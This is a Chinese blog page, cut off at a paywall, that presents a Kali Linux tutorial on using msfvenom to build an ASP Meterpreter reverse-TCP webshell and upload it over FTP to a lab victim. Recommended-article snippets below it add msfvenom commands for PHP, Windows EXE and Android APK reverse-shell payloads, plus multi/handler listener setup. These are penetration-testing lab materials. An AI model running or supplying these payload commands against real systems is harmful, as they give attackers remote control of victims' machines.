kali攻防第13章 Metasploit之生成webshell及应用

最新推荐文章于 2025-07-11 10:08:47 发布
置顶 最新推荐文章于 2025-07-11 10:08:47 发布
阅读量6.4k 收藏 9
点赞数
CC 4.0 BY-SA版权
分类专栏: 安全攻防之旅
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/strom2418/article/details/50393621

Metasploit之生成webshell及应用

 

准备工具

1、kali 系统 IP 10.10.10.131

2、受害者机子 IP 10.10.10.130

3、使用工具 Metasploit

 

步骤:

 

1、在msf生成asp脚本木马

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.131 -f asp > shell.asp

No platform was selected, choosing Msf::Module::Platform::Windows from the payload

No Arch selected, selecting Arch: x86 from the payload

No encoder or badchars specified, outputting raw payload

Payload size: 333 bytes

 

上传shell.asp到受害者机子

root@kali:~# ftp

ftp> open 10.10.10.130

Connected to 10.10.10.130.

220 Microsoft FTP Service

Name (10.10.10.130:root): administrator

331&nb

最低0.47元/天 解锁文章

200万优质内容无限畅学
[网络安全自学篇] 六十三.hack the box渗透之OpenAdmin题目及蚁剑管理员提权(四)
杨秀璋的专栏
03-27 1万+
在撰写这篇文之前,我先简单分享下hack the box实验感受。hack the box是一个在线渗透平台,模拟了真实环境且难度较大,各种Web渗透工具及操作串联在一起,挺有意思的。本文详细讲解了hack the box机器配置,通过OpenAdmin题目分享管理员权限Flag获取流程,希望对您有所帮助。同时,该网站题目细节不便于透露,推荐大家亲自去尝试,本文更多的分享一些思想。
【愚公系列】2023年06月 网络安全高级班 025.HW护网行动攻防演练介绍和工具
时光隧道
05-12 1万+
HW护网行动攻防演练是一种针对网络安全的实践活动,用于测试和提高组织的网络安全防御和攻击能力。通过模拟真实的网络攻击和防御行动,演练参与者在紧张压力下的反应和解决问题的能力,发现网络安全漏洞和提高安全意识,加强网络安全防御能力。攻防演练的成员组成一般包括攻击者、防御者和观察者三个角色。攻击者的任务是模拟真实的黑客攻击,找出系统的漏洞并利用其进行攻击,以检验系统的安全性。防御者则负责发现和修补漏洞,并保护系统不受攻击。观察者则负责记录和分析整个攻防过程,并提供建议和改进意见。
关于Kali的两个Webshell(Webacoo和Weevely)的学习笔记
Mi1k7ea
03-15 6565
Webacoo和Weevely是在Kali中默认安装了的Webshell,下面将分开进行介绍。 Web Backdoor Cookie(Webacoo): Webacoo的编码通信内容都是通过cookie头传输,隐蔽性强。 其Cookie头中的三个变量: cm:base64编码的命令 cn:服务器用于返回数据的cookie头的名 cp:返回信息定界符 直接在终端输
msf生成webshell_Metasploit 之使用socket通信的webshell简单分析
weixin_39693193的博客
12-22 399
Metasploit 之使用socket通信的webshell简单分析upload (Van Helsing) | 2013-01-08 21:530x01 前言常规的webshell都是调用该语言中常用函数来完成读取、执行等操作,从协议上来讲是采用http/https协议。但是和服务器通信还有另外一种方式:socket通信。常见的脚本语言asp,php,jsp,都可以实现对应的socket编程...
你知道有哪些常见端口吗
最新发布
bigbangbangbang1的博客
07-11 430
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。常用的端口是网络通信中指定服务的“门牌号”,掌握这些端口对于运维、安全和开发都非常重要。常用的端口是网络通信中指定服务的“门牌号”,掌握这些端口对于运维、安全和开发都非常重要。今天写一下常用的端口有哪些,这些端口都在工作中接触到的。的事情了,而工作绕不开的就是。大家最喜欢也是最关心的。
msf生成webshell_msf 之 webshell 提权
weixin_39623411的博客
12-22 469
首先建议一下到网上查查meterpreter的用法在看这篇文,理解为什么要使用msf来提权(因为msf里边有个meterpreter很强大 ^_^)Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe 型后门,一可以生成网页脚本类型的webshell ,通过生成webshell 然后设置监听器,访问webshell的url,幸运的话可以产...
kali下的webshell工具-Weevely
weixin_30457465的博客
03-11 756
Weevely ------------------------------------------------ 主要特点: · 隐蔽的类终端的PHP webshell · 30多个管理模块 o 执行系统命令、浏览文件系统 o 检查目标服务器的常见配置错误 o 基于现有连接,创建正向、反向的TCP shell连接 o 通过目标...
kali中的webshell生成工具weevely
k851819815的博客
02-21 963
用法 usage: weevely [-h] {terminal,session,generate} ... 参数: {terminal,session,generate} terminal Run terminal or command on the target #在目标上运行终端或命令 session Recover an existing s...
从实践中学习Kali Linux渗透测试
cc123489ll的博客
06-19 955
1.1.1 黑盒测试黑盒测试(Black-box Testing)也称为外部测试(ExternalTesting)。采用这种方式,测试者将从一个远程网络位置评估目标网络基础设施,并没有任何目标网络内部拓扑等相关信息。完全模拟真实网络环境中的外部攻击者,采用流行技术与工具有组织、有步骤的对目标组织进行渗透和入侵,揭示目标网络中一些已知或未知的安全漏洞,并评估这些漏洞能否被利用。优点:有利于挖掘出系统潜在的漏洞,以及脆弱环节和薄弱点。缺点:测试较为费时和费力,同时需要渗透测试者具备较高的技术能力。
[网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)
热门推荐
杨秀璋的专栏
04-10 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可能利用此漏洞远程无需用户验证,执行恶意代码并获取机器的完全控制。本文将详细讲解Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。由于hack the box速度堪忧,作者选择了Vulnhub靶场,希望深入分析来
kali中的webshell工具--webacoo
weixin_30698527的博客
03-10 1082
webacoo webshell其实就是放置在服务器上的一段代码 kali生成webshell的工具 WeBaCoo(Web Backdoor Cookie) 特点及使用方法 类终端的shell 编码通信内容通过cookie头传输,隐蔽性强 cookie中传递数据使用的参数: cm:base64编码的命令 cn:服务器用于返回数据的cooki...
Metasploitwebshell 提权
weixin_34314962的博客
07-30 211
本文所涉及的方法只能在已授权的机器上做测试。 首先建议一下到网上查查meterpreter的用法在看这篇文,理解为什么要使用msf来提权(因为msf里边有个meterpreter很强大 ^_^) Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe 型后门,一可以生成网页脚本类型的webs...
msf生成webshell_生成常用的msf
weixin_39759441的博客
12-22 850
msf作为一款强大的漏洞检测工具,如何生成适用于msf的payload以及如何利用是使用msf的关键,今天就主要记录一下常用的payload以及如何使用。生成payload使用的工具是MSFVenom,下面看看他的帮助信息。在kali下可以使用如下命令列出MSFVenom可以生成的payload列表:msfvenom -l生成二进制文件关于二进制文件,主要介绍适用于Windows、linux、ma...
Kali工具-webshell之weevely
明明见自己的专栏
03-29 1163
kali中常用的webshell工具-weevely,可以对网站的文件上传漏洞进行测试。
Metasploitwebshell提权
weixin_34318272的博客
05-03 321
Metasploitwebshell提权 本文所涉及的方法只能在已授权的机器上做测试。 首先建议一下到网上查查meterpreter的用法在看这篇文,理解为什么要使用msf来提权(因为msf里边有个meterpreter很强大^_^) Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe 型后门,...
Kali渗透测试_WebShell
分享学习网络的点点滴滴
08-29 729
中国菜刀可能被IDS、AV、WAF、扫描器软件发现查杀。
msf生成webshell_MSF之Web渗透
weixin_36212560的博客
01-13 937
WebShellroot@kali:~# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.80.163 LPORT=3333 -f raw -o a.php 生成a.phpmsf > use exploit/multi/handlermsf exploit(handler) > set payload php/meterpr...
使用kalimetasploit生成病毒
04-28
### 使用 Kali Linux 和 Metasploit 生成 Payload 或病毒文件 在 Kali Linux 的 Metasploit 框架中,可以利用 `msfvenom` 工具生成各种类型的 payload 文件。以下是关于如何生成 payload 的详细说明: #### 1. **准备工作** 在开始之前,需确保已正确配置好 Metasploit 数据库并切换到 root 用户权限下操作。通过以下命令完成环境准备: ```bash sudo su msfdb init ``` #### 2. **使用 msfvenom 生成 Payload** `msfvenom` 是一个强大的工具,用于生成自定义的 exploit payloads 并将其导出为多种格式(如 `.exe`, `.dll`, `.apk` 等)。以下是具体方法: ##### (1)基本语法结构 ```bash msfvenom -p <payload> LHOST=<本地IP地址> LPORT=<监听端口> -f <输出格式> -o <保存路径> ``` - `-p`: 指定要使用的 payload 类型。 - `LHOST`: 设置反向连接的目标 IP 地址(即攻击者的 IP 地址)。 - `LPORT`: 设置监听端口号。 - `-f`: 输出文件格式(例如 exe, dll, apk 等)。 - `-o`: 将生成的 payload 保存到指定位置。 ##### (2)常见 Payload 示例 ###### Windows 反向 Shell (EXE 格式) 生成一个针对 Windows 系统的反向 shell EXE 文件: ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe -o /root/payload.exe ``` 此命令会生成名为 `payload.exe` 的恶意程序[^1]。 ###### Android APK 攻击载荷 如果目标设备是安卓手机,则可以选择生成 APK 文件作为诱饵应用程序: ```bash msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 R > /root/android_payload.apk ``` 这将创建一个带有 Meterpreter 功能的恶意 APK 应用程序[^3]。 #### 3. **设置监听器捕获连接** 为了接收来自受害主机发起的回调请求,在另一终端窗口启动 multi/handler 模块等待传入的数据流: ```ruby use exploit/multi/handler set PAYLOAD <与前面一致的payload名称> set LHOST <本地IP地址> set LPORT <相同端口号> exploit ``` #### 注意事项 尽管技术本身并无善恶之分,但非法入侵他人计算机系统属于违法行为,请务必仅限于合法授权范围内的安全研究活动之中!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

随行之旅

python国产化自动化

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值